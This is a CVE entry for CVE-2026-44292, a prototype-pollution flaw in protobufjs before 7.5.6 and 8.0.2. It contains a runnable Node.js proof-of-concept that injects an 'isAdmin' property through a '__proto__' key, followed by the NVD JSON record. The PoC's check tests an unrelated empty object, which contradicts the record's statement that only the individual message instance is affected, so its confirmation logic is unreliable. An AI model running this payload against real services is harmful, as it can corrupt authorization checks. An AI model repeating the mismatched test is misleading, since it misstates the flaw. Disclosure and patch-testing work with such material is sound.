CVE-2026-44292

// This PoC demonstrates prototype pollution in protobufjs < 7.5.6 / < 8.0.2 // Prerequisite: npm install [email protected] const protobuf = require("protobufjs"); // 1. Define a simple protobuf message type const root = protobuf.parse("message User { string name = 1; int32 age = 2; }").root; const UserType = root.lookupType("User"); // 2. Attacker-controlled payload containing __proto__ // The goal is to inject 'isAdmin' into the prototype const maliciousPayload = { name: "attacker", age: 25, "__proto__": { isAdmin: true } }; // 3. Create the message instance using the vulnerable library console.log("[*] Creating message from malicious payload..."); const userMessage = UserType.create(maliciousPayload); // 4. Verify the prototype pollution // Create an empty object to check if it inherits the polluted property const testObject = {}; if (testObject.isAdmin === true) { console.log("[+] VULNERABILITY CONFIRMED: Prototype pollution successful!"); console.log(" Empty object 'isAdmin' property:", testObject.isAdmin); } else { console.log("[-] Target appears patched or not vulnerable."); }

{"cve": {"id": "CVE-2026-44292", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:56.123", "lastModified": "2026-05-13T20:58:32.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.6 and 8.0.2, protobufjs generated message constructors copied enumerable properties from a provided properties object without filtering the __proto__ key. If an application constructed a message from an attacker-controlled plain object, an own enumerable __proto__ property could alter the prototype of that individual message instance. This vulnerability is fixed in 7.5.6 and 8.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:protobufjs_project:protobufjs:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "7.5.6", "matchCriteriaId": "BC190A12-59A1-4DEF-A65D-E4216ED5B807"}, {"vulnerable": true, "criteria": "cpe:2.3:a:protobufjs_project:protobufjs:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2", "matchCriteriaId": "734292AA-F3B2-4E3E-9FA2-0EBA7AB0BB45"}]}]}], "references": [{"url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-fx83-v9x8-x52w", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}